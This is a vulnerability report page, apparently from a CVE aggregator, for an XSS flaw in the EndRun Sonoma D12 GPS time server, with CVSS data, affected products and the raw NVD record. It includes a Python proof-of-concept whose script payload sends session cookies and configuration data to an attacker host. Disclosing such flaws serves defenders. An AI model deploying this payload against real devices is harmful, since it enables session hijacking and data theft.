Security Vulnerability Report
中文
CVE-2025-60967 CVSS 7.3 HIGH

CVE-2025-60967

Published: 2025-10-06 17:16:08
Last Modified: 2025-10-10 16:15:01

Description

Cross Site Scripting (XSS) vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0076-000 Ver 4.00 allows attackers to gain sensitive information.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0076-000:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:* - NOT VULNERABLE
EndRun Technologies Sonoma D12 Network Time Server (GPS) 固件 6010-0076-000 Ver 4.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60967 - Sonoma D12 XSS PoC # Author: xdiv-sec # Description: Cross Site Scripting vulnerability in EndRun Sonoma D12 NTP Server # Firmware: 6010-0076-000 Ver 4.00 import requests TARGET_URL = "http://target-sonoma-d12" SESSION_COOKIE = "session=authenticated_session_cookie" # Malicious JavaScript payload to steal sensitive information XSS_PAYLOAD = """ <script> // Exfiltrate admin session cookies var img = new Image(); img.src = "http://attacker.com/steal?cookie=" + document.cookie; // Exfiltrate sensitive configuration data fetch('/config', {credentials: 'include'}) .then(response => response.text()) .then(data => { fetch('http://attacker.com/exfil', { method: 'POST', body: data }); }); </script> """ # Inject XSS payload into vulnerable parameter def exploit_xss(): headers = { "Cookie": SESSION_COOKIE, "Content-Type": "application/x-www-form-urlencoded" } # The vulnerable parameter may vary based on the specific endpoint params = { "username": XSS_PAYLOAD, # Example vulnerable parameter "comment": XSS_PAYLOAD # Alternative injection point } response = requests.post( f"{TARGET_URL}/admin/vulnerable_endpoint", headers=headers, data=params ) if response.status_code == 200: print("[+] XSS payload injected successfully") else: print(f"[-] Failed with status code: {response.status_code}") if __name__ == "__main__": exploit_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60967", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:07.533", "lastModified": "2025-10-10T16:15:00.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting (XSS) vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0076-000 Ver 4.00 allows attackers to gain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0076-000:*:*:*:*:*:*:*", "matchCriteriaId": "8CA2E5C0-1204-40D4-A54E-7290175F9401"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:*", "matchCriteriaId": "2D229C97-27FA-4DC6-9EB9-7757C6638143"}]}]}], "references": [{"url": "http://endrun.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://sonoma.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}